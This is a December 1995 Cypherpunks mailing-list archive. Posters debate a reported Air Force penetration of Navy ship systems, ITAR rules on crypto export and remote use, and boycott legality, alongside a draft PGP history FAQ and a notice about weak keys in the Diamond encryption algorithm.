is another technique by which the source is obscured by an automatic rewrite mechanism. This provides for both obscuration of the source and the ability to determine who originated illicit copies. I believe it was first implemented by Gimbel Software as part of their C-terp system (unpublished). A paper on techniques for doing this has also been published: "Operating System Protection Through Program Evolution" Computers and Security - 1992? 3? (F. Cohen) -> See: Info-Sec Heaven at URL http://all.net/ Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From fc at all.net Fri Dec 22 04:06:16 1995 From: fc at all.net (Dr. Frederick B. Cohen) Date: Fri, 22 Dec 95 04:06:16 PST Subject: Navy hacked by Air Force? Message-ID: <9512221202.AA06399@all.net> Following is the actual text extracted from iw at all.net - I doubt if the U.S. DoD will want to release all the details, but we can ask! >From: iw at all.net Subject: IW Mailing List iw/951221 --------------------------------------------- Moderator's Note: Subject: Navy hacked by Air Force I talked to some people I know about the perported IW attack on a battleship by the Air Force, and I thought I would help debunk this story, which my contacts tell me is "wildly inaccurate", but looking at a few facts. Let's start with the title: > War of the microchips: the day a hacker seized control of a US battleship There are NO active US battleships!!! And there weren't any last September. So, at a minimum, there are factual errors. ... > BY SIMPLY dialing the Internet and entering some well-judged keystrokes, > a young US air force captain opened a potentially devastating new era in > warfare in a secret experiment conducted late last September. His > target was no less than gaining unauthorised control of the US Navy's > Atlantic Fleet. According to my sources this was not "SIMPLY dialing the Internet and entering some well-judged keystrokes". It was a controlled experiment with participation of both Navy and Air Force, and involved a great deal of planning by a large number of people. It was performed using DoD owned and properly keyed cryptographic devices designed to be allowed to communicate with the systems being attacked. ... > He was armed with nothing other than a shop-bought computer and modem. > He had no special insider knowledge but was known to be a computer > whizzkid, just like the people the Pentagon most want to keep out. 100% wrong - he was an insider, he had a great deal of assitance, he had cryptographic devices and keys, and he had special insider knowledge. If he was an Air Force captain, he could not have been all that young. Whizzkids are usually considered teenagers. Anyone know of any teenaged AF captains these days? ... > A few clicks and whirrs were the only signs of activity. And then a > seemingly simple e-mail message entered the target ship's computer > system. ... > targeted ships surrendered control as the codes buried in the e-mail > message multiplied inside the ships' computers. A whole naval battle > group was, in effect, being run down a phone-line. Fortunately, this Not quite. This was not an email sent from some Internet site and email messages did not multiply inside the ships' computers. Furthermore, the total bandwidth of a phone line is nowhere near enough to "run" a naval battle group, or probably even a naval kitchen for that matter. > The exact method of entry remains a classified secret. The first (only?) really true part of the story. -> See: Info-Sec Heaven at URL http://all.net/ Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From junger at pdj2-ra.F-REMOTE.CWRU.Edu Fri Dec 22 05:21:52 1995 From: junger at pdj2-ra.F-REMOTE.CWRU.Edu (Peter D. Junger) Date: Fri, 22 Dec 95 05:21:52 PST Subject: Remote use=export? In-Reply-To: <9512220547.AA27294@fly.HiWAAY.net> Message-ID: Jeff Gehlbach writes: : -----BEGIN PGP SIGNED MESSAGE----- : : I apologize if this is a dead horse, but... : : Is granting use of crypto software running in the US to a remote user : outside the US considered exportation? For example, if allow my friend in : Paris to use a PGP binary residing and running on my PC in Washington, is : either of us violating any ITAR or similar restrictions? Nothing about the ITAR is unambiguous, but since what is forbidden is ``exporting'', which includes ``disclosing to foreign persons'', and since use is not forbidden, it is hard to see how what you suggest could violate the ITAR. (And I don't know of any other U.S. law or regulation that it could violate.) On the other hand, it may violate French law, which, or so I understand, does forbid the use of crypto unless the keys are made available to the French government. But I really don't know anything about French law. -- Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH Internet: junger at pdj2-ra.f-remote.cwru.edu junger at samsara.law.cwru.edu From martin at mrrl.lut.ac.uk Fri Dec 22 07:48:35 1995 From: martin at mrrl.lut.ac.uk (Martin Hamilton) Date: Fri, 22 Dec 95 07:48:35 PST Subject: Navy hacked by Air Force? In-Reply-To: <9512221202.AA06399@all.net> Message-ID: <199512221547.PAA27415@gizmo.lut.ac.uk> Dr. Frederick B. Cohen writes: | > The exact method of entry remains a classified secret. | | The first (only?) really true part of the story. To combine two favourite threads - it's that sendmail 8.7.3 hole *they* don't want you to know about...! Cheerio, (and Merry Xmas :-) Martin From rjacoby1 at osf1.gmu.edu Fri Dec 22 07:52:46 1995 From: rjacoby1 at osf1.gmu.edu (Robert A. Jacoby) Date: Fri, 22 Dec 95 07:52:46 PST Subject: GAK boycott, What are legal implications? In-Reply-To: <30d9ca78.flight@flight.hrnowl.lonestar.org> Message-ID: On Thu, 21 Dec 1995, Paul Elliott wrote: Gee, being legally responsible for lost revenue over a boycott. Rev. Donald Wilmond is going to be very broke! I don't know anything about the NAACP case, but it seems to me that free speech & merely *urging* people to boycott would be a perfect defense. > -----BEGIN PGP SIGNED MESSAGE----- > > Here is a question for all of you cyber legal types out there. > This question presupposes: > > The NIST will complete its work on the GAK standard. But no law will be > passed (yet) regulating the use of encryption in the U. S. (The GAK standard > is an attempt to create an environment in which such laws can be passed.) > In the U.S., Big Company INC will start marketing a GAKed encryption > product domesticly. > > A bunch of cypherpunkish types will immediately try to organize a boycott > against BIG COMPANY. > > What are the cypherpunks legal risks? > > I seem to remember that back in the 70s, the NAACP lost a big case > with respect to their boycott in a southern city. As I recall there were people > in the street begging money for the NAACP because there was a > 10**6 $ > judgement against the NAACP and they needed that much just to appeal. > > > - -- > Paul Elliott Telephone: 1-713-781-4543 > Paul.Elliott at hrnowl.lonestar.org Address: 3987 South Gessner #224 > Houston Texas 77063 > > -----BEGIN PGP SIGNATURE----- > Version: 2.6.2 > > iQCVAwUBMNnJ8/BUQYbUhJh5AQGbsgP/T0n31SqeuHt+7AbizymcEhu/78DUuym5 > sj+MO3ruA9WcEBQUXfabuf/PgOwlrtUAcC3dISPvXwGbdygc9oHBfxSglLi48g7d > dvDS4wziRHF7N8sBsYn0ee9YyKhPd9U7Ci0ovOc5frFGSZ2Bt4hU703d7bR+6cB+ > iHHqsPaAa6o= > =EPoj > -----END PGP SIGNATURE----- > > Robert A. Jacoby (speaking only for myself--not legal advice) Assistant Law Librarian for LAN/Reference George Mason University Law Library (703) 993-8107 rjacoby1 at osf1.gmu.edu From stend at cris.com Fri Dec 22 08:37:15 1995 From: stend at cris.com (Sten Drescher) Date: Fri, 22 Dec 95 08:37:15 PST Subject: Air Force hacks Navy? Eeeek! In-Reply-To: Message-ID: <55wx7p3vfz.fsf@galil.austnsc.tandem.com> Light Ray said: LR> Read this. It's from the Electronic Telegraph, a neat web site in LR> the UK. This article was later posted to comp.risks, and hence, LR> Risks Forum digest, which is where I found it. The paragraphs have LR> been numbered for easy reference. [...] LR> Let's pick the article apart: [...] I saw the IW article that Light Ray saw in the RISKS Digest, and, while it raises some valid questions, it in turn has some internal problems. For example, the IW author apparently doesn't understand the difference between a Navy captain (O-6) and an Air Force captain (O-3), dismissing the whole story because a Navy captain would be far to old to be a 'whizzkid'. Problem is the story said it was an Air Force captain, and a newly pinned AF captain would certainly be young enough to be considered one in the military culture (had I stuck it out through ROTC, I would have been able to make captain at 24). While the ET article looks like it was written by someone who didn't understand the fine details of what happened, the IW article looks like it was written as military smokescreen. -- #include /* Sten Drescher */ To get my PGP public key, send me email with your public key and Subject: PGP key exchange Key fingerprint = 90 5F 1D FD A6 7C 84 5E A9 D3 90 16 B2 44 C4 F3 Junk email is NOT appreciated. If I want to buy something, I'll find you. From stend at cris.com Fri Dec 22 08:47:23 1995 From: stend at cris.com (Sten Drescher) Date: Fri, 22 Dec 95 08:47:23 PST Subject: Navy hacked by Air Force? In-Reply-To: <9512221202.AA06399@all.net> Message-ID: <55vin93uyk.fsf@galil.austnsc.tandem.com> On Cypherpunks, fc at all.net (Dr. Frederick B. Cohen) said: FBC> Following is the actual text extracted from iw at all.net - I doubt if FBC> the U.S. DoD will want to release all the details, but we can ask! Strange, Dr Fred, this isn't the 'actual text' I saw quoted in RISKS Digest - did you 'fix' it so that it was a bit more credible? Dr Fred's paragraph: FBC> 100% wrong - he was an insider, he had a great deal of assitance, FBC> he had cryptographic devices and keys, and he had special insider FBC> knowledge. If he was an Air Force captain, he could not have been FBC> all that young. Whizzkids are usually considered teenagers. FBC> Anyone know of any teenaged AF captains these days? RISKS Digest's paragraph: RISKS> 100% wrong - he was an insider, he had a great deal of RISKS> assistance, he had cryptographic devices and keys, and he had RISKS> special insider knowledge. If he was a Navy captain, he could RISKS> not have been all that young. Whizzkids are usually considered RISKS> teenagers. Anyone know of any teenaged Navy captains? Has anyone seen the REAL IW article, so we can tell what was really said? The age difference between an AF captain and a Navy captain is enough that one could be considered a 'whizzkid' in the military, while the other could not. -- #include /* Sten Drescher */ To get my PGP public key, send me email with your public key and Subject: PGP key exchange Key fingerprint = 90 5F 1D FD A6 7C 84 5E A9 D3 90 16 B2 44 C4 F3 Junk email is NOT appreciated. If I want to buy something, I'll find you. From andr0id at midwest.net Fri Dec 22 08:55:49 1995 From: andr0id at midwest.net (Jason Rentz) Date: Fri, 22 Dec 95 08:55:49 PST Subject: Message-ID: <199512221717.LAA02498@cdale1.midwest.net> > [snip] > There is a company called Optoelectronics that markets a radio reciever > called the Interceptor. This is a broad band (several hundred MHz) > device designed to lock on to the most powerful signal around, > regardless of frequency. As supplied, it only has a rubber duck > antenna, but a broadband, directional antenna (Log Periodic?) could be > attached. There are AM and FM versions that output audio and a version > called the Scout that controls a scanner. These could have outboard > devices hung on to them to decode digital signals, record the > conversation ... all for less than $1000. > > > > Floyd D. Barber > floyddb at alpha.c2.org > Key fingerprint: > 8A 98 1F 6B 70 7A FE 24 > 35 D4 48 CF 9D F6 B0 91 The problem with the Interceptor is that I think it can only receive one freqency at a time, and it is adjustable by a thumb wheel, not digitally. This would tend to make changing frequencies at high rates VERY hard. :) Also it has no frequancy readout, so this means that if you know what freq. you should be at it is hard to tune in that freq. without searching a little. Dr0id ( Computer Consulting & Management ) (P.O. Box 421 Cambria, IL 62915-0421) -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQENAzCsIi4AAAEH/1hb5+tO/n99Nbppf0ImLJ6AaVZ3NlZP0ZHwRQor00uA129i d4zWixNXxc8t2auaqN+asV99LpIip3/nQzBnjydiumeBdGLF2PR9+6X8X/RrqKa1 dVIukxM5Agg2eM6ih+0J38hgKJ3qzKXSz6sjYmpaxvbXZoHHOLUk/ZtHUKvvEyPw hnJEYnut8NUnIeK56lqeqRw86yoeRKymbfCdjdpgeY2aRwK2FJts8sbb7Fs10s4y jgxWIxIipBznbGUTh1hb2XrLGPENwk3E/qqXQJEsrySbtwdl6VgTVQjhDDEJMitL DYeiQ3W5EgxfcdbM1j2FwYu3P/dM6Y0I8xLMYT0ABRG0NmFuZHIwaWRAb2ljdTgx Mi5jb20gKG9pY3U4MTIuY29tIHN5c3RlbSBhZG1pbmlzdHJhdG9yKYkBFQMFEDCs LO90C7R/GkJcSQEB01cH/0KC3sd+u4OxMku5378SJktoN6QIQYLJ7uVbuV4S51yK NAotCGf4Wl6wwjynzZvXKU0H87oDuMiq7FybgMNL2n+4bQIZi0iz0lIuzwoMDu63 NrHUW9Kz42pOnhrEhrdkHhHL9O5GgD1yc40fJ3qw5h7LQEjDxgypyw0IFILFc34u LeRLliNibxKp8JwAxXNHWSgxu28TQvmnkHi0AHP6tJ/uZYe+4dqJtrMMsYFjzZaz DPmxD+dzbTwlQKtJaP1ZkDI0Sr072wrZDv+G86GyGBMX2lpSafpRitnxuUttjU9o wsQ9Qo5xiH1nZRCs/bDzJe/gng+GHzevixDIITurtNA= =SgPT -----END PGP PUBLIC KEY BLOCK----- From Majordomo at toad.com Fri Dec 22 05:33:14 1995 From: Majordomo at toad.com (Majordomo at toad.com) Date: Fri, 22 Dec 1995 21:33:14 +0800 Subject: Your Majordomo request results Message-ID: <9512221332.AA29343@toad.com> -- Your request of Majordomo was: >>>> subscribe cypherpunks Succeeded. Your request of Majordomo was: >>>> end END OF COMMANDS From aba at atlas.ex.ac.uk Fri Dec 22 06:33:49 1995 From: aba at atlas.ex.ac.uk (aba at atlas.ex.ac.uk) Date: Fri, 22 Dec 1995 22:33:49 +0800 Subject: PGP timeline FAQ... comments requested Message-ID: <297.9512221337@exe.dcs.exeter.ac.uk> There seems to be much confusion amongst some of the newer users of PGP who frequent alt.security.pgp, and recently whilst delving in to give my version of how it happened my post got longer and longer, until it grew on the spur of the moment into a sort of FAQ. I got a few comments, and corrections from that post, but I thought there are likely to be people who know more annecdotes and were around at the time that RSA was being published in the face of NSA opposition, etc. Let me have your comments on the accuracy, plus any annecdotes which you think really should go in to give the correct feel for the historical timeline. Thanks, Adam ====================================================================== PGP timeline and brief history ====================================================================== contents: 0 Definitions of acronyms 1 History of crypto as it applies to PGP 2 Birth of PGP 3 USG decides they don't like PRZ 4 PRZ, MIT and RSA sort out earlier patent issues 5 Current legal status 6 ITARs viewed from inside the US 7 ITARs viewed from outside the US ====================================================================== 0 definitions of acronyms ====================================================================== PGP = Pretty Good Privacy PRZ = Phil R Zimmermann, internet folk hero, author of PGP RSA = The RSA public key algorithm as used in PGP RSADSI = rsa.com, RSA Data Security Inc, patent holders of some public key stuff, which they claim means that no one can use RSA without getting a license from them. PKP = public key partners RSADSI plus Cylink (plus others?) (now disbanded) ITAR = International Traffic in Arms Regulations controls export of controlled munitions from the US, things like military aircraft components, biological and chemical weapons, and also (very strangely) cryptographic software. PK = public key (crypto) NSA = US National Security Agency, US govt's largest spook agency. whimsically known as No Such Agency, because until recently the US govt tried to deny they even existed. OTDC = Office of Defense Trade Controls, USG group charged with enforcing ITAR. They consult with the NSA, the NSA has the last word on what gets export approval. ====================================================================== 1 History of crypto as it applies to PGP ====================================================================== 1.1 The year is 1976 a cryptographer, and privacy advocate named Whitfield Diffie, together with mathematician named Martin Hellman discovers public key cryptography. (DH key exchange is still a commonly used key exchange protocol -- DH = Diffie-Hellman). 1.2 1977 Ron Rivest, Adi Shamir, and Len Adleman discover another more general public key system called RSA (after surnames Rivest, Shamir, and Adleman). R, S & A were researchers at MIT (significant later, because MIT had part ownership of patents.) 1.3 NSA tells MIT and R, S & A that they'd better not publish this or else. 1.4 Amusingly Adi Shamir (A from RSA) isn't even a US citizen, he's an Israeli national, and is now back in Israel at the Technicon (is he, anyone know his current affiliation?) Who knows what the NSA would have done about him if they had succeeded in supressing RSA - not allowed him out of the US? 1.5 MIT and R, S & A ignore NSA and publish anyway in SciAm July 1977. Comms ACM (feb 1978, vol 21, no 2, pp 120-126 in case you want to see if it's in your library - it's in Exeter Univ (UK) library). 1.6 Because the publication was a rush job due to the NSA, R,S & A and the later formed PKP and RSADSI lose patent rights to RSA crypto outside the US. This is because most places outside the US, you have to obtain a patent *before* publication, where as in the US, you have one year from the publication date to file for patents. This also had implications for PGP later 1.7 IDEA was developed by Xuejia Lai and James Massey at ETH in Zurich. (Relevant to PGP because IDEA is the symmetric key cipher used together with RSA in PGP). Also crypto politics relevance in that it is another (of many) examples of the fact that crypto knowledge and expertise is worldwide, ie why export restrict something which is available both sides of the ITAR fence, or even originated *outside* it? (Strangely, ITAR applies to importing and then re-exporting a crypto system, even if no modifications are made). There are lots of other symmetric key ciphers, IDEA is one with a good reputation (no known practical attacks better than brute-force to date, and a good key size), and is just referenced here because of its use in PGP. (some years pass...) ====================================================================== 2 Birth of PGP ====================================================================== 2.1 PRZ wrote PGP 2.2 PRZ gave PGP to some friends 2.3 some friends up loaded onto a few bulletin boards (US only) One friend (allegedly Kelly Goen) went around pay-phones with a portable, an acoustic coupler, and a list of BBS phone numbers uploading and then driving on to another area. This cloak and dagger stuff was because at the time the USG had some draconian sounding proposed law on the books which sounded like it was going to outlaw crypto. The intention was to ensure that PGP was available before this law came into effect, and to avoid being stopped if the USG took interest. 2.4 somehow PGP leaked outside the US via the internet. Information wants to be free, as someone said: `trying to control the free flow of information on the internet is like trying to plug a sieve with a hole in it'. Also Tim May's quote 'National borders are just speedbumps on the information superhighway' expresses the point very nicely. 2.5 people all over the world (yeah outside the US too) start using PGP 2.6 RSA complains to PRZ that PGP violates their PK patents 2.7 PRZ tells RSA to get stuffed, says its the users problem to get a license 2.8 PGP is considered potentially patent infringing because of 2.6 2.9 Illegality taint increases the spread of PGP, generates news, more people get a copy to see what the fuss is about (some time passes, PGP gets real popular...) ====================================================================== 3 USG decides they don't like PRZ ====================================================================== 3.1 US govt decides that they don't like PRZ because the NSA can't tap all those internet mail messages anymore. (the NSA part is speculation, but in my opinion likely true). 3.2 US govt begins investigating PRZ for alleged aiding with ITAR violation. 3.3 Phil Zimmermann legal defense fund set up to cover his legal expenses 3.4 still on going... (concurrently...) ====================================================================== 4 PRZ, MIT and RSA sort out earlier patent issues ====================================================================== 4.1 MIT and PRZ work with RSA to sort out patent issue. 4.2 A solution is obtained in that RSA agree that PGP can use RSA provided that their RSAREF library is used. 4.3 PGP2.5 is written which uses RSAREF in place of MPILIB (also has backwards compatibility with older versions impaired to discourage use of older allegedly patent infringing versions - to keep RSA happy) 4.4 RSAREF may be slower, but at least with some negotiating by PRZ and MIT, PGP is now 100% legal in the US 4.5 MIT begins acting as official US distributor of PGP 4.6 As usual, a few milli-seconds (well okay, minutes) after the official release of a new version of PGP, it gets exported from the US. 4.7 The deal with RSA over RSAREF has fixed the patent related problems in the US, but it has created a copyright related problem outside the US, (recall 0.6). RSAREF is a software package copyrighted by RSA, and RSA is not allowed to export it because of ITAR, and their license agreement says as much (ie it says that you must not export it, and if you do export, you, and the subsequent users of it, are in breach of license). It is therefore supposed that RSA could if they wanted complain about this (who knows that they would want to, or what conceivable benefit it would give them if they did). This isn't enough to bother most people, but commercial users, and big organisations have lawyers, and are wary of such things. 4.8 Staale Schaumaker put together pgp26i to avoid this problem. Main difference between pgp26x and pgp26xi is that pgp26xi uses PRZs original big integer library MPILIB, which is any case faster than RSADSI's RSAREF, and the lack of the legal kludge noted in 3.3. ====================================================================== 5 Current legal status ====================================================================== 5.1 PGP is legal both inside and outside the US. You just need to use pgp26 versions inside the US, and pgp26xi versions outside the US. 5.2 In the US if you are using PGP in a commercial setting, and care about patents, you should purchase a copy of ViaCrypt pgp2.7 5.3 Commercial use outside the US: RSA is free, in the PGP docs (pgp262i & pgp262) Ascom-Tech are quoted as saying that currently no license is required for commercial use of PGP outside the US as far as they are concerned. Ascom-Tech are the patent holders of IDEA (see 1.7), the symmetric crypto system used by PGP. ====================================================================== 6 ITARs viewed from inside the US ====================================================================== 6.1 ITAR means that if you are in the US you should not export PGP. (Yeah it's already available on a few thousand ftp sites around the free world, so another export isn't going to make any difference, but the NSA and the ODTC might not see it in that light). 6.2 Even though controlling the export of freeware software available worldwide might seem incredibly stupid (not to mention pointless), you should bear in mind that the penalties for getting successfully prosecuted for violating ITAR are rather steep. Up to $1,000,000 (US$) fine, and and up to10 years imprisonment per count of export. 6.3 They'd probably never do anything to you, PRZ is just a scape goat (someone they can symbolically persecute to discourage others). I have personally seen several people from US sites post crypto source and binaries (nautilus, PGP itself even). Plus of course this: #!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL $m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa 2/d0 From blancw at accessone.com Sat Dec 23 02:30:26 1995 From: blancw at accessone.com (blancw at accessone.com) Date: Sat, 23 Dec 95 02:30:26 PST Subject: Cypherpunks resumes? Message-ID: <9512231030.AA05276@pulm1.accessone.com> From: attila the Hutt So, who the fuck am I? --just another aging 300 lb gorilla, long haired hippie California freak with an outlaw chopper. ................................................... Such a lovely place... such a lovely face... (sorry, I couldn't help myself) .. Blanc From fc at all.net Fri Dec 22 11:58:39 1995 From: fc at all.net (Fred Cohen) Date: Sat, 23 Dec 1995 03:58:39 +0800 Subject: Air Force hacks Navy? Eeeek! In-Reply-To: <55wx7p3vfz.fsf@galil.austnsc.tandem.com> Message-ID: <9512221857.AA17752@all.net> > I saw the IW article that Light Ray saw in the RISKS Digest, > and, while it raises some valid questions, it in turn has some internal > problems. For example, the IW author apparently doesn't understand the > difference between a Navy captain (O-6) and an Air Force captain (O-3), > dismissing the whole story because a Navy captain would be far to old to > be a 'whizzkid'. Am I reading a different article? What I read was that the IW person talked to several inside sources and found out and reported facts. S/He made a mistake in saying Navy instead of AF somewhere in his posting to Risks and fixed it before sending it to the IW list (which is where I got it). From what I read, s/he found out the truth from people who knew the truth and tried to get the word out. > I would have been able to make captain at 24). While the ET article > looks like it was written by someone who didn't understand the fine > details of what happened, the IW article looks like it was written as > military smokescreen. I thought the ET article indicated an exaguration, but if it's true that there are no Battleships in the US Navy anymore and that the attack was run using DoD crypto equipment and networks, it's a heck of a lot different than buying an off-the-shelf Internet package and taking down the fleet. I have no doubt that someone with enough expertise, classified knowledge and equipment, access, and assistance can get some limited control over some US Navy ships for some period of time - but I seriously doubt that a computer whizzkid can take over the fleet from a PC via Email. -> See: Info-Sec Heaven at URL http://all.net/ Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From an170150 at anon.penet.fi Fri Dec 22 12:02:03 1995 From: an170150 at anon.penet.fi (an170150 at anon.penet.fi) Date: Sat, 23 Dec 1995 04:02:03 +0800 Subject: No subject Message-ID: <9512221713.AA19435@anon.penet.fi> Hi, excuse me for interrupting your conversation with a different subject, but I am not on the list (any longer, due to the bandwidth) so please reply "directly" to me at an170150 at anon.penet.fi ...my question is: Are there any other anon servers running the same software as the one @alpha.c2.org? --****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION*** Your e-mail reply to this message WILL be *automatically* ANONYMIZED. Please, report inappropriate use to abuse at anon.penet.fi For information (incl. non-anon reply) write to help at anon.penet.fi If you have any problems, address them to admin at anon.penet.fi From sinclai at ecf.toronto.edu Fri Dec 22 12:02:35 1995 From: sinclai at ecf.toronto.edu (SINCLAIR DOUGLAS N) Date: Sat, 23 Dec 1995 04:02:35 +0800 Subject: Remote use=export? In-Reply-To: Message-ID: <95Dec22.121656edt.1000@cannon.ecf.toronto.edu> > Jeff Gehlbach writes: > > : -----BEGIN PGP SIGNED MESSAGE----- > : > : I apologize if this is a dead horse, but... > : > : Is granting use of crypto software running in the US to a remote user > : outside the US considered exportation? For example, if allow my friend in > : Paris to use a PGP binary residing and running on my PC in Washington, is > : either of us violating any ITAR or similar restrictions? > > Nothing about the ITAR is unambiguous, but since what is forbidden is > ``exporting'', which includes ``disclosing to foreign persons'', and > since use is not forbidden, it is hard to see how what you suggest > could violate the ITAR. (And I don't know of any other U.S. law or > regulation that it could violate.) If memory serves, Digital Equipment Corp was obliged to remove a demonstration supercomputer from the net. The argument was that Iraqis could telnet into it (it had free guest accounts) and run nuclear weapons simulations on it. Some of the list members probably remember the details. From ses at tipper.oit.unc.edu Fri Dec 22 12:02:47 1995 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Sat, 23 Dec 1995 04:02:47 +0800 Subject: Remote use=export? In-Reply-To: <9512220547.AA27294@fly.HiWAAY.net> Message-ID: On Thu, 21 Dec 1995, Jeff Gehlbach wrote: > > Is granting use of crypto software running in the US to a remote user > outside the US considered exportation? For example, if allow my friend in Not export, but disclosure, and hence a violation. From jps at monad.semcor.com Fri Dec 22 12:08:10 1995 From: jps at monad.semcor.com (Jack P. Starrantino) Date: Sat, 23 Dec 1995 04:08:10 +0800 Subject: Air Force hacks Navy? Eeeek! In-Reply-To: Message-ID: <9512221714.AA13065@monad.semcor.com> The following article is from Defense News Oct. 9-15, 1995 pp1,37. Hacker Exposes U.S. Vulnerability By Pat Cooper and Frank Oliveri Defense News Staff Writers Washington -- A U.S. Air Force captain, using a personal computer and a modem, penetrated the command and control systems of U.S. Navy ships operating in the Atlantic Ocean, exhibiting the awesome offensive capability of information warfare and the significant danger U.S. forces are just beginning to learn how to counter. Air Force personnel based at Hanscom Air Force Base, Mass., with the knowledge and permission of the Navy, penetrated the computer systems of naval ships in the Atlantic Ocean, Air Force Lt. Gen. John Fairfield, deputy chief of staff for command, control, communications and computers, said Sept. 25. Using standard computers, Air Force operators tapped into the Internet, via a telephone link to the information superhighway, and connected with a ship through an electronic mail link in one of the ships' networked computers, Air Force Officials said Sept. 28. Once inside the ship's computer network, Air Force Operators navigated to the ships command and control system and could have given the ship bogus steering commands, Fairfield said. The methods of the break-in and the actual vulnerabilities it exposed are classified. jps -- Jack P. Starrantino (215) 674-0200 (voice) SEMCOR, Inc. (215) 443-0474 (fax) 65 West Street Road jps at semcor.com Suite C-100 Warminster, PA 18974 From stend at cris.com Fri Dec 22 12:11:00 1995 From: stend at cris.com (Sten Drescher) Date: Sat, 23 Dec 1995 04:11:00 +0800 Subject: Navy hacked by Air Force? In-Reply-To: <9512221718.AA15130@all.net> Message-ID: <55oht13r97.fsf@galil.austnsc.tandem.com> fc at all.net (Fred Cohen) said: FC> Credible? No. Accurate? Yes. We all make mistakes, and whenever I FC> find one that I've made, I try to admit it and fix it ASAP. What's FC> not credible is people who don't correct mistakes when they find FC> them. Well, you corrected it, but you didn't admit it, at least not here, and it makes people who made comments on the _original_ version look like fools. Next time when you quote a corrected article, please note that it's been corrected. The difference between an AF captain (4 years of service) and a Navy captain (17-ish years of service) is substantial when when judging whether they could be considered 'whizzkids' in this environment. -- #include /* Sten Drescher */ To get my PGP public key, send me email with your public key and Subject: PGP key exchange Key fingerprint = 90 5F 1D FD A6 7C 84 5E A9 D3 90 16 B2 44 C4 F3 Junk email is NOT appreciated. If I want to buy something, I'll find you. From fc at all.net Fri Dec 22 12:25:53 1995 From: fc at all.net (Fred Cohen) Date: Sat, 23 Dec 1995 04:25:53 +0800 Subject: Navy hacked by Air Force? In-Reply-To: <55vin93uyk.fsf@galil.austnsc.tandem.com> Message-ID: <9512221718.AA15130@all.net> > On Cypherpunks, fc at all.net (Dr. Frederick B. Cohen) said: > ... > Strange, Dr Fred, this isn't the 'actual text' I saw quoted in > RISKS Digest - did you 'fix' it so that it was a bit more credible? > > Dr Fred's paragraph: > > FBC> 100% wrong - he was an insider, he had a great deal of assitance, > FBC> he had cryptographic devices and keys, and he had special insider > FBC> knowledge. If he was an Air Force captain, he could not have been > FBC> all that young. Whizzkids are usually considered teenagers. > FBC> Anyone know of any teenaged AF captains these days? > > RISKS Digest's paragraph: > > RISKS> 100% wrong - he was an insider, he had a great deal of > RISKS> assistance, he had cryptographic devices and keys, and he had > RISKS> special insider knowledge. If he was a Navy captain, he could > RISKS> not have been all that young. Whizzkids are usually considered > RISKS> teenagers. Anyone know of any teenaged Navy captains? Credible? No. Accurate? Yes. We all make mistakes, and whenever I find one that I've made, I try to admit it and fix it ASAP. What's not credible is people who don't correct mistakes when they find them. -> See: Info-Sec Heaven at URL http://all.net/ Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From tedwards at Glue.umd.edu Fri Dec 22 12:27:30 1995 From: tedwards at Glue.umd.edu (Thomas Grant Edwards) Date: Sat, 23 Dec 1995 04:27:30 +0800 Subject: GAK shutdown? Message-ID: Last night I realized that NIST has been shutdown since the weekend...congratulations to congress for a temporary halt to GAK! -Thomas From alano at teleport.com Fri Dec 22 12:29:48 1995 From: alano at teleport.com (Alan Olsen) Date: Sat, 23 Dec 1995 04:29:48 +0800 Subject: Attacking Clipper with timing info? Message-ID: <2.2b7.32.19951222174145.008d7eb0@mail.teleport.com> At 12:49 AM 12/22/95 -0600, you wrote: >Of course, if we did not pax taxes there would be no need to wonder if >we're getting our money's worth. A self-funded,for-profit NSA? Now >there's a liberatarian idea if I ever heard one. A similar concept has already been explored. Check out http://www.digicrime.com/ I am sure that a "for profit NSA" would be very similar in content and substance to the company at that URL. | Remember: Life is not always champagne. Sometimes it is REAL pain. | |"The moral PGP Diffie taught Zimmerman unites all| Disclaimer: | | mankind free in one-key-steganography-privacy!" | Ignore the man | |`finger -l alano at teleport.com` for PGP 2.6.2 key | behind the keyboard.| | http://www.teleport.com/~alano/ | alano at teleport.com | From mpj at netcom.com Fri Dec 22 12:30:20 1995 From: mpj at netcom.com (Michael Paul Johnson) Date: Sat, 23 Dec 1995 04:30:20 +0800 Subject: Weak keys in Diamond Encryption Algorithm fixed. Message-ID: -----BEGIN PGP SIGNED MESSAGE----- ******* There is a class of weak keys in the Diamond Encryption Algorithm. These are the ones that result in all of the individual substitution arrays being the same. This has a probability of about 2^-40 of happening, and is not the basis of a practical attack, but it is interesting, anyway. Thanks to Colin Plumb for pointing this out. This weakness has been eliminated in the Diamond2 Encryption Algorithm. See ftp://ftp.csn.net/mpj/public/diamond2.ps.gz for details. If you are in the USA or Canada, there is a reference implementation (as well as the above document) in ftp://ftp.csn.net/mpj/I_will_not_export/crypto_???????/file/diamond2.zip, where the ??????? is revealed in ftp://ftp.csn.net/mpj/README along with an export warning. ******* I've also put an updated description of another algorithm, the Sapphire II Stream Cipher, in ftp://ftp.csn.net/mpj/public/sapphire.ps.gz and a reference implementation in ftp://ftp.csn.net/mpj/I_will_not_export/crypto_???????/file/sapphire.zip ******* DLOCK2.ZIP and SAPPHIRE.ZIP are also on the Colorado Catacombs BBS at 303-772-1062. ******* You are invited to review the above algorithms and let me know if you find any weakness in them. ******* These are not commercial products, and this is not an advertisement. This is an electronic publication for the enjoyment of people who are interested in cryptography for constructive purposes. Merry Christmas! ___________________________________________________________ | | |\ /| | | Michael Paul Johnson Colorado Catacombs BBS 303-772-1062 | | \/ |o| | PO Box 1151, Longmont CO 80502-1151 USA Jesus is alive! | | | | / _ | mpj at csn.org aka mpj at netcom.com m.p.johnson at ieee.org | | |||/ /_\ | ftp://ftp.csn.net/mpj/README.MPJ CIS: 71331,2332 | | |||\ ( | ftp://ftp.netcom.com/pub/mp/mpj/README -. --- ----- .... | | ||| \ \_/ | PGPprint=F2 5E A1 C1 A6 CF EF 71 12 1F 91 92 6A ED AE A9 | |___________________________________________________________| -----BEGIN PGP SIGNATURE----- Version: 2.7.1 